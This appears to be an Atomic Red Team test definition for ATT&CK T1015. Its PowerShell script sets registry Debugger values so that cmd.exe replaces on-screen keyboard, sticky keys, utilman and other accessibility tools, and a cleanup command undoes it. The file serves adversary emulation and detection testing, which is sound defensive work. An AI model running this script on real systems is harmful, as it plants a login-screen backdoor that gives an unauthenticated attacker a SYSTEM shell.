---
attack_technique: T1015
display_name: Accessibility Features

atomic_tests:
- name: Attaches Command Prompt as a Debugger to a List of Target Processes
  auto_generated_guid: 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9
  description: |
    Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.

    Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.
  supported_platforms:
    - windows
  input_arguments:
    parent_list:
      description: |
        Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe"
      type: String
      default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe
    attached_process:
      description: |
        Full path to process to attach to target in #{parent_list}. Default: cmd.exe
      type: Path
      default: C:\windows\system32\cmd.exe

  executor:
    name: powershell
    elevation_required: true
    command: |
      $input_table = "#{parent_list}".split(",")
      $Name = "Debugger"
      $Value = "#{attached_process}"
      Foreach ($item in $input_table){   
        $item = $item.trim()
        $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
        IF(!(Test-Path $registryPath))
        {
          New-Item -Path $registryPath -Force
          New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
        }
        ELSE
        {
          New-ItemProperty -Path $registryPath -Name $name -Value $Value
        }
      }
    cleanup_command: |
      $input_table = "#{parent_list}".split(",")
      Foreach ($item in $input_table)
      {
        $item = $item.trim()
        reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f | Out-Null
      }
